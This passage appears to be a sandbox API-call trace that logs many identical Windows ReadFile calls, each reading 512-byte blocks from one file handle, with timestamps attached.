nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.700] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.701] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.709] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.710] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.711] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.712] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 
[0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.713] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, 
lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.714] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, 
lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: 
lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.715] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.716] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.716] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.716] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.719] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, 
lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.720] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.721] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee1d4, lpOverlapped=0x0 | out: lpBuffer=0x2eefe4*, lpNumberOfBytesRead=0x2ee1d4*=0x200, lpOverlapped=0x0) returned 1 [0133.722] ReadFile (in: hFile=0x58, lpBuffer=0x2eefe4, nNumberOfBytesToRead=0x200, 